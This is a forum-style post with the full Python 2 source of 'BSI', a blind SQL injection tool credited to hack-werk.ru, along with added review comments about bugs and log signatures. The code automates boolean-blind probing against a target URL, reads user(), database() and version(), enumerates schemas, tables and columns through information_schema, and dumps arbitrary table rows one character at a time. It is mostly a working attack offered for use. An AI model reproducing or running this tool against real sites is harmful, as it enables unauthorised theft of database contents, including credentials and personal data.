[Python] BSI - Blind SQL Injection Tool
Name: BSI - Blind SQL Injection Tool
Release-Date: 06.02.2012
Coder: gehaxelt
Sprache: Python
The correct:
=> BSI.py
--all
Name: BSI - Blind SQL Injection Tool
Release-Date: 06.02.2012
Coder: gehaxelt
Sprache: Python
Code:
>import re, urllib2, datetime, sys, hashlib
def calcMD5(string):
    """Return the hexadecimal MD5 digest of *string*.

    The digest is used only as a cheap fingerprint of a response body
    (two responses are "the same page" iff their digests match); it is
    not used as a security primitive, so MD5's collision weakness is not
    a concern for this purpose.
    """
    digest = hashlib.md5()
    digest.update(string)
    return digest.hexdigest()
def getDateString():
    """Return today's date as ``D_M_YYYY`` (no zero padding).

    Only used to build the name of the daily log file, so the unpadded,
    non-sortable format is harmless here.
    """
    today = datetime.date.today()
    parts = (today.day, today.month, today.year)
    return "_".join(str(part) for part in parts)
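def log(string):
    """Append *string* plus a newline to today's log file.

    The file is ``log-<D_M_YYYY>.txt`` (see getDateString) in the
    current working directory and is opened in append mode, so every run
    on the same day accumulates into the same file.  Everything the tool
    extracts is written here in plain text, which makes this file a
    useful artefact when a host is examined after the fact.
    """
    # ``with`` closes the handle even if write() raises, so the file is
    # not leaked on the error path; ``fh`` also avoids shadowing the
    # ``file`` builtin.
    with open("log-"+getDateString()+".txt", "a") as fh:
        fh.write(string+"\n")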
def getContent(url):
    """Fetch *url* with urllib2 and return the response body as a string.

    Any failure -- network error, HTTP error status (urlopen raises for
    those), malformed URL, and even KeyboardInterrupt/SystemExit because
    the ``except`` is bare -- is reported on stdout and turned into an
    empty string, so callers cannot distinguish a genuinely empty
    response from a failed request.  No timeout is passed to urlopen,
    so an unresponsive server blocks the whole tool.
    """
    try:
        # Plain urlopen with no custom headers: the stock "Python-urllib"
        # User-Agent is sent with every probe, an easy thing to spot in
        # web-server access logs.
        request=urllib2.urlopen(url)
        return request.read();
    except:
        # Bare except swallows every exception type; catching
        # urllib2.URLError would keep Ctrl-C and exit() working.
        print "Error sending HTTP-Request"
        return ""
def checkKeyWord(content,keyword):
    """Return True iff the MD5 fingerprint of *content* equals *keyword*.

    *keyword* is the fingerprint of the reference ("condition true")
    page computed once in the main block; this is the single comparison
    every boolean probe in the tool is reduced to.
    """
    return calcMD5(content) == keyword
def checkIsKeywordUnique(url,keyword):
    """Return False (and say so) when the page does not react to an
    injected condition; True otherwise.

    Sends the control pair ``and 1=1 --`` / ``and 1=2 --`` appended to
    *url*.  If *both* responses hash to *keyword* the page looks the
    same for a true and a false condition, so the boolean oracle the
    rest of the tool relies on does not exist.  Only that case is
    detected: if the first probe already fails to match (for instance
    because the server answers every probe with the same block page),
    the ``and`` short-circuits and the function still returns True.

    Defender note: two requests differing only in ``1=1``/``1=2`` are a
    high-confidence log signature for boolean-blind probing.
    """
    if(checkKeyWord(getContent(url+"+and+1=1+--+"),keyword) and checkKeyWord(getContent(url+"+and+1=2+--+"),keyword)):
        print "Keyword "+keyword+" is not unique!"
        return False
    return True
def getContentLength(url,keyword,query):
    """Find the string length of SQL expression *query* by boolean
    probing and return it.

    *keyword* is the MD5 fingerprint of the "condition true" page.
    Phase 1 steps i through 0, 25, ..., 225 and stops at the first i for
    which ``LENGTH(query) > i`` matches; phase 2 probes
    ``LENGTH(query) = i`` for every i from that point up to 299 and
    returns the first hit.  If nothing matches, an error is printed and
    the tool terminates through the ``exit()`` builtin (SystemExit).
    """
    start=1
    # Coarse phase.  The probe is "greater than i", so for any non-empty
    # value the first request (i=0) already matches and start becomes 0.
    for i in range(0,250,25):
        if(checkKeyWord(getContent(url+"+AnD+LeNgTh("+query+")>"+str(i)+"+--+"),keyword)):
            start=i
            break
    # Fine phase: one request per candidate length.  The requests differ
    # only in the trailing integer -- a pattern that stands out in logs.
    for i in range(start,300):
        if(checkKeyWord(getContent(url+"+AnD+LeNgTh("+query+")="+str(i)+"+--+"),keyword)):
            return i
    print "Error getting contentlength!"
    print "Exiting!"
    # Site builtin exit(): raises SystemExit, which the bare except
    # around the main block catches as well.
    exit()
def getDBContent(url,keyword,query,length):
    """Extract the string value of SQL expression *query* one character
    at a time, for positions 1..*length*, and return it.

    For each position the ASCII code of ``substring(query, i, 1)`` is
    first bucketed with up to three ``>=`` probes (97+, 65+, 48+, else
    33+) and then pinned down by a linear ``=`` scan over that bucket
    (``range(start, end, 1)``, end exclusive).  Every recovered
    character is appended to the running result, which is echoed to
    stdout after each hit.  A position whose code is never matched is
    silently skipped, so the returned string may be shorter than
    *length*.

    Cost: three bucket probes plus up to 31 equality probes per
    character, i.e. a long burst of requests that differ only in two
    integers -- exactly the traffic shape a rate- or pattern-based
    detector should flag.
    """
    tmp=""
    for i in range(1,length+1):
        # Bucket the character by its ASCII code: lower-case letters and
        # above, upper-case letters, digits, or punctuation.
        if(checkKeyWord(getContent(url+"+and+ascii(substring("+query+","+str(i)+",1))>=97+--+"),keyword)):
            start=97
            end=126
        elif(checkKeyWord(getContent(url+"+and+ascii(substring("+query+","+str(i)+",1))>=65+--+"),keyword)):
            start=65
            end=96
        elif(checkKeyWord(getContent(url+"+and+ascii(substring("+query+","+str(i)+",1))>=48+--+"),keyword)):
            start=48
            end=64
        else:
            start=33
            end=47
        # Linear scan inside the bucket; stops at the first match.
        for j in range(start,end,1):
            if(checkKeyWord(getContent(url+"+and+ascii(substring("+query+","+str(i)+",1))="+str(j)+"+--+"),keyword)):
                tmp=tmp+chr(j)
                print "Content: "+tmp
                break
    return tmp
def getRowCount(url,keyword,query):
    """Find the integer value of the scalar SQL subquery *query* (a
    ``select count(*)`` in every caller in this file) by boolean
    probing and return it.

    Same two-phase scheme as getContentLength: ``(query) > i`` in steps
    of 25, then ``(query) = i`` for i from the coarse result up to 249.
    If no value in that range matches, an error is printed and the tool
    terminates through the ``exit()`` builtin (SystemExit).
    """
    start=1
    # Coarse phase; for any positive count the i=0 probe already matches.
    for i in range(0,250,25):
        if(checkKeyWord(getContent(url+"+and+("+query+")>"+str(i)+"+--+"),keyword)):
            start=i
            break
    # Fine phase: one request per candidate value.
    for i in range(start,250):
        if(checkKeyWord(getContent(url+"+and+("+query+")="+str(i)+"+--+"),keyword)):
            return i
    print "Error getting rowcount!"
    print "Exiting"
    exit()
def getVersion(url,keyword):
    """Report whether the DBMS major version is 5.x or 4.x.

    Two probes compare the first character of ``version()`` (a
    MySQL-style function) with 5 and then 4.  The outcome -- or an error
    line for any other major version -- is printed and appended to the
    daily log, preceded by the target URL.
    """
    log(">>>"+url)
    print "Getting version():"
    if(checkKeyWord(getContent(url+"+and+substring(version(),1,1)=5+--+"),keyword)):
        print "Version is: 5.x"
        log(">Version is: 5.x")
    elif(checkKeyWord(getContent(url+"+and+substring(version(),1,1)=4+--+"),keyword)):
        print "Version is: 4.x"
        log(">Version is: 4.x")
    else:
        print "Error getting the version"
        log(">Error getting the version")
def getDatabase(url,keyword):
    """Enumerate schema names from information_schema.schemata, then
    extract ``database()``; print and log everything.

    Steps: (1) getRowCount on ``select count(*) from
    information_schema.schemata``; (2) for each row index i a
    ``... limit i,1`` subquery selecting schema_name is measured with
    getContentLength and then read with getDBContent; (3) the collected
    names are listed again; (4) ``database()`` is measured and read the
    same way.  Every recovered value is also written to the daily log.
    """
    log(">>>"+url)
    print "Getting databasecount..."
    rows=getRowCount(url,keyword,"select+count(*)+from+information_schema.schemata")
    print "Databasecount is: "+str(rows)
    content=[]
    for i in range(0,rows,1):
        print "["+str(i)+"]Getting databaselength..."
        # "information_schema".encode("hex") is the Python 2 str->hex
        # codec; it yields the same bytes as the 0x696e66... literal that
        # getTables spells out by hand.
        rowlen=getContentLength(url,keyword,"(select+schema_name+from+information_schema.schemata+where+schema_name++0x"+"information_schema".encode("hex")+"+limit+"+str(i)+",1)")
        print "["+str(i)+"]Databaselength is: "+str(rowlen)
        print "["+str(i)+"]Getting databasename..."
        content.append(getDBContent(url,keyword,"(select+schema_name+from+information_schema.schemata+where+schema_name++0x"+"information_schema".encode("hex")+"+limit+"+str(i)+",1)",rowlen))
        print "["+str(i)+"]Databasename is: "+ content[len(content)-1]
        log(">["+str(i)+"]Databasename is: "+ content[len(content)-1])
    print "Finished!"
    print "Databases found:"
    # Display bug: i is reset to 0 and never incremented, so every entry
    # below is printed with index "[0]".  ``id`` shadows the builtin.
    i=0
    for id in range(0,len(content)):
        print "["+str(i)+"]"+content[id]
        log(">["+str(i)+"]"+content[id])
    print "Getting database():"
    print "Getting contentlength..."
    clength=getContentLength(url,keyword,"database()")
    print "Contentlength is: "+str(clength)
    log(">Contentlength is: "+str(clength))
    print "Getting content..."
    content=getDBContent(url,keyword,"database()",clength)
    print "Content is: "+content
    log(">Content is: "+content)
def getUser(url,keyword):
    """Extract the value of ``user()``: measure its length with
    getContentLength, read it with getDBContent, then print and log the
    result (the target URL is logged first).
    """
    log(">>>"+url)
    print "Getting user():"
    print "Getting contentlength..."
    clength=getContentLength(url,keyword,"user()")
    print "Contentlength is: "+str(clength)
    log(">Contentlength is: "+str(clength))
    print "Getting content..."
    content=getDBContent(url,keyword,"user()",clength)
    print "Content is: "+content
    log(">Content is: "+content)
def getTables(url,keyword):
    """Enumerate table names from information_schema.tables, filtered on
    table_schema against the hex literal 0x696e666f726d6174696f6e5f736368656d61
    (the bytes of the string "information_schema"); print and log them.

    Same shape as getDatabase: count rows, then for each row index i
    measure and read a ``... limit i,1`` subquery selecting table_name,
    and finally list the collected names.
    """
    log(">>>"+url)
    print "Getting tablecount..."
    rows=getRowCount(url,keyword,"select+count(*)+from+information_schema.tables+where+table_schema++0x696e666f726d6174696f6e5f736368656d61")
    print "Tablecount is: "+str(rows)
    log(">Tablecount is: "+str(rows))
    content=[]
    for i in range(0,rows,1):
        print "["+str(i)+"]Getting tablelength..."
        rowlen=getContentLength(url,keyword,"(select+table_name+from+information_schema.tables+where+table_schema++0x696e666f726d6174696f6e5f736368656d61+limit+"+str(i)+",1)")
        print "["+str(i)+"]Tablelength is: "+str(rowlen)
        print "["+str(i)+"]Getting tablename..."
        content.append(getDBContent(url,keyword,"(select+table_name+from+information_schema.tables+where+table_schema++0x696e666f726d6174696f6e5f736368656d61+limit+"+str(i)+",1)",rowlen))
        print "["+str(i)+"]Tablename is: "+ content[len(content)-1]
        log(">["+str(i)+"]Tablename is: "+ content[len(content)-1])
    print "Finished!"
    print "Tables found:"
    # Display bug: i stays 0, so every entry is listed as "[0]".
    i=0
    for id in range(0,len(content)):
        print "["+str(i)+"]"+content[id]
        log(">["+str(i)+"]"+content[id])
def getColumns(url,keyword,table):
    """Enumerate column names of *table* from information_schema.columns;
    print and log them.

    *table* comes straight from the command line and is embedded as a
    hex literal (``table.encode("hex")``, Python 2 str->hex codec).  Same
    count / measure / read / list shape as getTables.
    """
    log(">>>"+url)
    print "Getting columncount..."
    rows=getRowCount(url,keyword,"select+count(*)+from+information_schema.columns+where+table_name+=+0x"+table.encode("hex"))
    print "Columncount is: "+str(rows)
    content=[]
    for i in range(0,rows,1):
        print "["+str(i)+"]Getting columnlength..."
        rowlen=getContentLength(url,keyword,"(select+column_name+from+information_schema.columns+where+table_name+=+0x"+table.encode("hex")+"+limit+"+str(i)+",1)")
        print "["+str(i)+"]Columnlength is: "+str(rowlen)
        print "["+str(i)+"]Getting columnname..."
        content.append(getDBContent(url,keyword,"(select+column_name+from+information_schema.columns+where+table_name+=+0x"+table.encode("hex")+"+limit+"+str(i)+",1)",rowlen))
        print "["+str(i)+"]Columnname is: "+ content[len(content)-1]
        log(">["+str(i)+"]Columname is: "+ content[len(content)-1])
    print "Finished!"
    print "Columns found:"
    # Display bug: i stays 0, so every entry is listed as "[0]".
    i=0
    for id in range(0,len(content)):
        print "["+str(i)+"]"+content[id]
        log(">["+str(i)+"]"+content[id])
def Dump(url,keyword,table,cols):
    """Read *cols* from every row of *table*; print and log each row.

    *table* and *cols* (a comma-separated column list) come straight
    from the command line and are spliced into the query verbatim.  The
    row count is found with getRowCount; for each row index i the value
    of ``concat_ws(0x3a, cols) ... limit i,1`` (0x3a is ':', the field
    separator) is measured and read.  The usage text notes that only the
    current ``database()`` can be dumped this way.
    """
    log(">>>"+url)
    print "Getting rowcount..."
    rows=getRowCount(url,keyword,"select+count(*)+from+"+table)
    print "Rowcount is: "+str(rows)
    content=[]
    for i in range(0,rows,1):
        print "["+str(i)+"]Getting rowlength..."
        rowlen=getContentLength(url,keyword,"(select+concat_ws(0x3a,"+cols+")+from+"+table+"+limit+"+str(i)+",1)")
        print "["+str(i)+"]Rowlength is: "+str(rowlen)
        print "["+str(i)+"]Getting rowcontent..."
        content.append(getDBContent(url,keyword,"(select+concat_ws(0x3a,"+cols+")+from+"+table+"+limit+"+str(i)+",1)",rowlen))
        print "["+str(i)+"]Rowcontent is: "+ content[len(content)-1]
        log(">["+str(i)+"]Rowcontent is: "+ content[len(content)-1])
    print "Finished!"
    print "Content found:"
    # Display bug: i stays 0, so every row is listed as "[0]".
    i=0
    for id in range(0,len(content)):
        print "["+str(i)+"]"+content[id]
        log(">["+str(i)+"]"+content[id])
def usage():
    """Write the command-line help text to stdout.

    The text is a single literal; it is written with a trailing newline,
    exactly as the print statement would emit it.
    """
    text = '''
Usage:
=> BSI.py URL KEYWORD option[s]
Options:
=>--database\t\tRetrieves the current database
=>--version\t\tRetrieves the DBMS-version
=>--user\t\tRetrieves the current DB-user
=>--all\t\t\tRetrieves the three information mentioned bevor
=>--tables\t\tRetrieves all tables in the database
=>--columns TABLENAME\tRetrieves all columns of the given table
=>--dump TABLE COLUMN1,COLUMN2,...\tRetrieves the data of a table
==>Currently only dumps of database() are possible!
Example:
=> BSI.py http://127.0.0.1/vuln.php?id=10 --all
'''
    sys.stdout.write(text + "\n")
def header():
    """Write the tool banner to stdout (literal plus one trailing newline)."""
    banner = '''
Blind SQL Injector by Coding Crew @ Hack-Werk.ru
Version 1.1
Visit www.hack-werk.ru
'''
    sys.stdout.write(banner + "\n")
# Entry point.  The whole option dispatch sits inside one bare try/except:
# *any* exception -- a missing argv element (IndexError), a failed request
# that propagates, and even the SystemExit raised by the exit() calls in
# getContentLength/getRowCount and in the "Unkown option" branch -- ends
# up in the except branch, which prints usage() and exits.  A genuine
# error is therefore indistinguishable from "wrong arguments".
#
# NOTE(review): indentation was lost in the paste.  It is not certain
# whether the option dispatch was nested under the keyword-uniqueness
# check (the tool would then silently do nothing when the keyword is not
# unique) or followed it at the same level, as reconstructed here.
try:
    header()
    # argv[1] is the injectable URL, used verbatim with no validation.
    url= sys.argv[1]
    # Baseline fingerprint: MD5 of the unmodified page.  Every later probe
    # compares its response hash against this value.
    keyword=calcMD5(getContent(url))
    if(checkIsKeywordUnique(url,keyword)):
        print "Keyword is unique!"
    # Dispatch on argv[2]; each branch first writes a marker line to the
    # daily log file.  Note: usage() documents a KEYWORD argument that is
    # never read -- the keyword is computed above.
    if(sys.argv[2]=="--version"):
        log("\n>>>>New attack: version()")
        getVersion(url,keyword)
    elif(sys.argv[2]=="--database"):
        log("\n>>>>New attack: database()")
        getDatabase(url,keyword)
    elif(sys.argv[2]=="--user"):
        log("\n>>>>New attack: user()")
        getUser(url,keyword)
    elif(sys.argv[2]=="--all"):
        log("\n>>>>New attack: version()/user()/database()")
        getVersion(url,keyword)
        getUser(url,keyword)
        getDatabase(url,keyword)
    elif(sys.argv[2]=="--tables"):
        log("\n>>>>New attack: tables")
        getTables(url,keyword)
    elif(sys.argv[2]=="--columns"):
        # argv[3]: table name, passed to getColumns unvalidated.
        tname=sys.argv[3]
        log("\n>>>>New attack: columns of "+tname)
        getColumns(url,keyword,tname)
    elif(sys.argv[2]=="--dump"):
        # argv[3]: table name; argv[4]: comma-separated column list.
        tname=sys.argv[3]
        cols=sys.argv[4].strip()
        log("\n>>>>New attack: Dump "+cols+" from "+tname)
        Dump(url,keyword,tname,cols)
    else:
        print "Error: Unkown option!"
        print "Exiting"
        # Raises SystemExit, which the bare except below intercepts, so
        # usage() is printed on this path too.
        exit()
except:
    # Catches everything, including SystemExit and KeyboardInterrupt.
    usage()
    exit()
=> BSI.py